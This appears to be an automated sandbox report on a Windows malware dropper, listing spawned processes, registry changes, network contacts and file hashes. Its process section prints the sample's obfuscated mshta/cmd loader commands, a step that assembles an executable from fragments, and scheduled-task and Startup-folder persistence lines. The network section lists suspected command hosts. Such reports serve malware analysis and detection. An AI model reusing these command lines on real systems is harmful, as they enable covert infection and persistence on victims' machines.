0403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
C:\Users\Admin\AppData\Local\Temp\inst001.exe
"C:\Users\Admin\AppData\Local\Temp\inst001.exe"
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
"C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp" /SL5="$601CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp" /SL5="$601EE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 85C0DFAD51D9FC560EA58E8674CEF4C2 C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1464
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\78224359952.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\96758969264.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1044
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\system32\taskeng.exe
taskeng.exe {966226A1-CBFB-44C8-97F7-47DE6F5BC114} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="1044" CHAINERUIPROCESSID="1044Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733132187 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000584" "0000000000000528"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2405DB814D59F3DF38C11B5F49434232
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\f7873aa.exe
"C:\Users\Admin\AppData\Local\Temp\f7873aa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 600
C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe
"C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | mas.to | udp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 104.21.11.154:443 | mas.to | tcp |
| US | 8.8.8.8:53 | abgtt.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:80 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | ocsp.r2m03.amazontrust.com | udp |
| DE | 13.224.191.223:80 | ocsp.r2m03.amazontrust.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | s3.us-central-1.wasabisys.com | udp |
| US | 38.91.42.102:443 | s3.us-central-1.wasabisys.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
Files
memory/2556-0-0x000000007403E000-0x000000007403F000-memory.dmp
memory/2556-1-0x0000000000970000-0x00000000010FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
| MD5 | 93460c75de91c3601b4a47d2b99d8f94 |
| SHA1 | f2e959a3291ef579ae254953e62d098fe4557572 |
| SHA256 | 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2 |
| SHA512 | 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856 |
\Users\Admin\AppData\Local\Temp\Firstoffer.exe
| MD5 | 568eaf0936546f3a4d478f0c249a68ff |
| SHA1 | 9e1a778d77d10955e7dc5af123c26e839b253838 |
| SHA256 | 623f08634b1a481b993c2c222f9cf1c87332d946ec7ebc6e2a49ea580f3502de |
| SHA512 | ffc5d1b53dbd7deaeded67a78810b9ffe2bf6a08307f79f0430cb9c4abc5df55fe01f35d33ec3d84b51de3e4bfed3e387eddc38198c0eaf34115edfacaaf98a9 |
memory/2524-17-0x000007FEF5E73000-0x000007FEF5E74000-memory.dmp
memory/2524-20-0x000000013F9F0000-0x000000013FA00000-memory.dmp
\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
| MD5 | 72f96cfde8a3c2abd3f38d8da2cfe889 |
| SHA1 | 72bbf2efd229601d52cce10cfd34fa4229520291 |
| SHA256 | 5b1568f481160da68223eeddcc201b3b0d03b9dddc85e4494e92ee6e919ce10d |
| SHA512 | 36e01f7216d9a5140c28350f95e7bffbfdb57d6a9b00b1e3df88587da9fcd772ac64edf021875e284039e21aaefaf7ec3595899cacfc8396933997e19fd734b9 |
memory/3064-27-0x0000000000240000-0x0000000000258000-memory.dmp
memory/3064-30-0x0000000000270000-0x0000000000276000-memory.dmp
\Users\Admin\AppData\Local\Temp\inst001.exe
| MD5 | 23bcdc132d1f2aaf8d248b6a5bd21801 |
| SHA1 | 2153acec77f4a57c621a3e38d523eb6df9b29134 |
| SHA256 | a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b |
| SHA512 | d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db |
\Users\Admin\AppData\Local\Temp\install.exe
| MD5 | 28fc3ef97675adb779a68c89e098e7ba |
| SHA1 | 4c8e04317d41426963a310230adb77c7c5ad67fd |
| SHA256 | 06fe5043a987831fcb4bb914b6bc939740f363f920d5145f3cd697a300e1c64d |
| SHA512 | 9355b28f9ce31da2afa2b5676b52032b92c5201c09cd506eadf89c9237f6114c13c0e0cac1fa65fff1ca6cf3c4165bbc148f1a13494ab3d59ba90fea354766ec |
memory/1640-39-0x00000000009F0000-0x0000000000AF0000-memory.dmp
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 90cfe790d93388738929453e0b8a976e |
| SHA1 | 0b8dd0ae4070259991b0de105ec3390afbb2fb44 |
| SHA256 | 2ded24319d6e74ee1b9ad2517fbfd1ceceeca9b854d34b722481cbc694270831 |
| SHA512 | 2a9b0fd6a3fe152f8cd5cb02703be679918949a9bbc86f90cd4cdb8bd68cee716561a80541a4620a20f034d04eef8e5ec9edae2c1969c45ab1fd03fc616e7162 |
\Users\Admin\AppData\Local\Temp\7.exe
| MD5 | 6a16fdad888507df0b938dd3421cc7cf |
| SHA1 | d60d3a5959349f1df9e83292003e547828535ea3 |
| SHA256 | 1bad2fb46b08904f12a4ea96ce3cf0582f9995c16a26143c16b858702793e166 |
| SHA512 | c6877e5b5b58730e188b441a67099605d2c6ae5dd94b2a0281534771555a09d144f952878e4ade462f33604e96a7f66dab5f18689b72d4ff589952784e1f9e16 |
memory/2868-65-0x00000000009B0000-0x00000000009B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
| MD5 | f39dd2806d71830979a3110eb9a0ae44 |
| SHA1 | fd94b99664d85eede48ab22f27054ab5cc6dd2d3 |
| SHA256 | c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213 |
| SHA512 | ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82 |
\Users\Admin\AppData\Local\Temp\setup_2.exe
| MD5 | 662af94a73a6350daea7dcbe5c8dfd38 |
| SHA1 | 7ab3ddd6e3cf8aaa7fa2c4fa7856bb83ea6a442c |
| SHA256 | df0b82e8877857057a9b64b73281099f723ae74b1353cf216ca11ba6b20b3ef8 |
| SHA512 | d864c483bfb74479c90ea38a46fe6cd3d628a8b13bd38acde4ccce3258ec290e5389fe920a4351dadb7fd23f87cd461ecf253c5d926f8277e518a7b5029f583a |
memory/1724-80-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
| MD5 | fce1bf8a528a6f3cd7fbfe8c5360bffb |
| SHA1 | 1d5a8cba2fe37249f08154f4de532f2b2703fbfd |
| SHA256 | 61f6aaf51880570891d51f241af185edfa7ae118b4c4d2ddba4ed12f314db69c |
| SHA512 | a5d559e62289c60348991ff1f8c9663b4e339bf8359bdb2b981824635ee0a475c31c6c5d84d38a9565ec609abe4243d963cccaf435091d1ed55c40498bed990a |
\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
| MD5 | 3d9122fa1978d737354a61b3b4fc2c1b |
| SHA1 | 955f39ab127baa0c5fd23a1724293b52ce48e10e |
| SHA256 | 90abe563deabe721caffa1a0297eb3e1ab5fdad2a4e8e0dba26764f169062e1e |
| SHA512 | f4f994ac1b5c2c9634fd3da58a1d993154eb2ed573bbc127466b90996970cf245453a9dd2d6ba642fbfae7bc7b7f2e8ff1671c0b7a638bd1a9afb54fb2b42d7a |
\Users\Admin\AppData\Local\Temp\is-N0CCE.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
| MD5 | e4ff121d36dff8e94df4e718ecd84aff |
| SHA1 | b84af5dae944bbf34d289d7616d2fef09dab26b7 |
| SHA256 | 2a019bc6bace686b08286ee7d8e2e66c18283b162d27774c486037c940dc60cc |
